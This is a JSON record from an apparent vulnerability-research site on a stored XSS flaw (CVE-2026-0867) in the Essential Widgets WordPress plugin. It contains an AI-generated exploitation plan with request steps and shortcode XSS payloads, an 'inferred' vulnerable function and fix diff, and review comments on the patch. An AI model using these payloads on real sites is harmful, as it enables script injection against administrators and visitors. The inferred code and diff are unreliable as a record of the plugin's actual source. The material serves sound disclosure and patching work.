[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZRI2uHsoGktSpQu7-rJa1R7nzaqLGBi4ytrUUc_YEPA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0867","essential-widgets-authenticated-contributor-stored-cross-site-scripting-via-multiple-shortcodes","Essential Widgets \u003C= 3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Shortcodes","The Essential Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ew-author, ew-archive, ew-category, ew-page, and ew-menu shortcodes in all versions up to, and including, 3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 
NOTE: This vulnerability was partially fixed in version 3.0.","essential-widgets",null,"\u003C=3.0","3.0.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-04 18:41:50","2026-02-05 06:47:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F08d4ed49-1338-422f-b55f-a102f2d1d6c8?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-0867\n\n## 1. Vulnerability Summary\nThe **Essential Widgets** plugin for WordPress (versions \u003C= 3.0) contains multiple Stored Cross-Site Scripting (XSS) vulnerabilities. The vulnerability exists within the rendering logic of several shortcodes: `ew-author`, `ew-archive`, `ew-category`, `ew-page`, and `ew-menu`. \n\nThe plugin fails to sanitize or escape user-provided attributes within these shortcodes before echoing them into the HTML output. An attacker with **Contributor-level** permissions or higher can create a post containing a malicious shortcode. When any user (including an Administrator) views the page, the injected script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Authentication Requirement:** Contributor+ (Authenticated). Contributors can create and save drafts but not publish. However, viewing a draft preview or an administrator auditing the draft will trigger the XSS.\n*   **Vulnerable Component:** Shortcode rendering functions.\n*   **Payload Carrier:** Shortcode attributes (e.g., `title`, `class`, `name`, `id`).\n*   **Delivery Method:** `POST` request to `wp-admin\u002Fpost.php` or `wp-admin\u002Fadmin-ajax.php` (for autosaves) to store the shortcode in a post\u002Fpage.\n*   **Sink:** Frontend or admin-side page rendering where the shortcode is processed by `do_shortcode()`.\n\n## 3. Code Flow (Inferred)\n1.  
**Registration:** The plugin registers shortcodes in its initialization phase (likely in the main plugin file or an `includes\u002F` file):\n    *   `add_shortcode('ew-author', 'ew_author_render_callback');`\n    *   `add_shortcode('ew-menu', 'ew_menu_render_callback');` (etc.)\n2.  **Processing:** When a post is viewed, WordPress calls the associated callback function (e.g., `ew_author_render_callback($atts)`).\n3.  **Attributes:** The callback uses `shortcode_atts()` to parse user input but fails to apply `esc_attr()` or `esc_html()` to the resulting array.\n4.  **Output:** The callback returns a string containing the raw attribute values embedded in HTML.\n    *   *Example Vulnerable Pattern:* `return '\u003Cdiv class=\"' . $atts['class'] . '\">...\u003C\u002Fdiv>';`\n5.  **Execution:** The browser renders the HTML, encountering the unescaped attribute and executing the JavaScript payload.\n\n## 4. Nonce Acquisition Strategy\nSince this is an **Authenticated** exploit, we must first authenticate as a Contributor. To save a post with the malicious shortcode, we need the standard WordPress post-editor nonces.\n\n1.  **Authentication:** Perform a login as the contributor user.\n2.  **Access Editor:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonces:**\n    *   Use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the `_wpnonce` from the form or the `wp-globals`:\n        *   `_wpnonce`: `document.querySelector('#_wpnonce').value`\n        *   `post_id`: `document.querySelector('#post_ID').value`\n4.  **Alternative (AJAX\u002FREST):** If the plugin uses a specific interface for block settings, check for `wp_localize_script` data:\n    *   `browser_eval(\"window.ew_settings?.nonce\")` (inferred variable name based on plugin slug).\n\n## 5. 
Exploitation Strategy\nWe will use the `ew-author` shortcode as the primary target.\n\n### Step 1: Create a Draft Post with Payload\n*   **Method:** `POST`\n*   **URL:** `{{BASE_URL}}\u002Fwp-admin\u002Fpost.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `{{POST_ID}}` (obtained from `post-new.php`)\n    *   `_wpnonce`: `{{NONCE}}`\n    *   `post_title`: `XSS Test`\n    *   `content`: `[ew-author title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `post_status`: `draft`\n\n### Step 2: Trigger the XSS\n*   **Method:** `GET`\n*   **URL:** `{{BASE_URL}}\u002F?p={{POST_ID}}&preview=true` (as Admin) or simply view the published post if the user has publishing rights.\n*   **Expected Behavior:** The browser executes `alert(document.domain)`.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install essential-widgets --version=3.0 --activate`\n2.  **Create User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Optional:** If the `ew-menu` shortcode is tested, create a dummy menu first:\n    *   `wp menu create \"Test Menu\"`\n    *   `[ew-menu menu='Test Menu\" onmouseover=\"alert(1)\" data-=\"']`\n\n## 7. Expected Results\n*   The HTTP response for the page view will contain the unescaped payload: `\u003Cdiv class=\"ew-author-wrapper\" title=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...`\n*   The `browser_eval` of `alert` triggers will confirm execution.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to confirm the payload is stored:\n    *   `wp post get {{POST_ID}} --field=post_content`\n2.  **Response Inspection:** Search for the string `\u003Cscript>alert` in the raw HTML response of the post preview using the `http_request` tool.\n\n## 9. 
Alternative Approaches\n### Shortcode: `ew-menu`\nIf `ew-author` is sanitized, try `ew-menu` which often handles complex inputs for menu selection.\n*   **Payload:** `[ew-menu menu='\u003C\u002Fscript>\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\n### Shortcode: `ew-page`\nOften these shortcodes have a `class` or `id` attribute for styling.\n*   **Payload:** `[ew-page class='\">\u003Cimg src=x onerror=alert(1)>']`\n\n### Shortcode: `ew-archive`\nCheck if `title` or `type` attributes are vulnerable.\n*   **Payload:** `[ew-archive title=\"\u003Csvg\u002Fonload=alert(1)>\"]`","The Essential Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several shortcodes (ew-author, ew-archive, ew-category, ew-page, and ew-menu) in versions up to 3.0. This occurs because the plugin fails to sanitize or escape user-supplied attributes before rendering them in HTML, allowing Contributor-level attackers to execute arbitrary scripts in the context of other users.","\u002F\u002F Inferred vulnerable implementation based on shortcode callback patterns\nfunction ew_author_render_callback( $atts ) {\n    $a = shortcode_atts( array(\n        'title' => '',\n        'class' => '',\n    ), $atts );\n\n    \u002F\u002F Vulnerable: Outputting raw attribute values without escaping\n    return '\u003Cdiv class=\"' . $a['class'] . '\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n}\n\n---\n\n\u002F\u002F Similar vulnerability in other registered shortcodes\nadd_shortcode('ew-menu', 'ew_menu_render_callback');\nfunction ew_menu_render_callback( $atts ) {\n    $a = shortcode_atts( array(\n        'menu' => '',\n    ), $atts );\n\n    \u002F\u002F Vulnerable: Attribute values reflected directly in HTML\n    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . $a['menu'] . '\">\u003C\u002Fnav>';\n}","--- a\u002Fessential-widgets.php\n+++ b\u002Fessential-widgets.php\n@@ -10,7 +10,7 @@\n     ), $atts );\n \n-    return '\u003Cdiv class=\"' . $a['class'] . 
'\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"' . esc_attr($a['class']) . '\">\u003Ch3>' . esc_html($a['title']) . '\u003C\u002Fh3>\u003C\u002Fdiv>';\n }\n \n@@ -20,5 +20,5 @@\n     ), $atts );\n \n-    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . $a['menu'] . '\">\u003C\u002Fnav>';\n+    return '\u003Cnav class=\"ew-menu-nav\" data-menu=\"' . esc_attr($a['menu']) . '\">\u003C\u002Fnav>';\n }","1. Authenticate to the WordPress site with Contributor-level permissions.\n2. Create a new post or edit an existing draft via \u002Fwp-admin\u002Fpost-new.php.\n3. Insert a malicious shortcode payload into the post content using a vulnerable attribute. Example: [ew-author title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'] or [ew-page class='\">\u003Cimg src=x onerror=alert(1)>'].\n4. Save the post as a draft or submit for review.\n5. Access the post's preview URL or wait for an administrator to view the post in the editor\u002Fpreview mode. The payload will execute in the viewer's browser context.","gemini-3-flash-preview","2026-04-27 15:19:11","2026-04-27 15:21:00",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-widgets\u002Ftags\u002F3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-widgets\u002Ftags\u002F3.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-widgets.3.0.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-widgets\u002Ftags"]
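Review bot: in the first hunk (@@ -10,7 +10,7 @@ of essential-widgets.php) the `class` value is only passed through esc_attr(), which stops the attribute breakout but still lets a contributor place any string in the class attribute. Since the value is meant to be a CSS class, consider running each space-separated token through sanitize_html_class() before output, and keep esc_html() on `title` as written.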
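Review bot: the second hunk (@@ -20,5 +20,5 @@) escapes `menu` for ew-menu, but the patch as shown changes only the ew-author and ew-menu return statements, while the description also names ew-archive, ew-category and ew-page as affected. Apply the same esc_attr() / esc_html() treatment at the output points of those callbacks, or point to where they are handled, given the description notes that 3.0 was already only a partial fix.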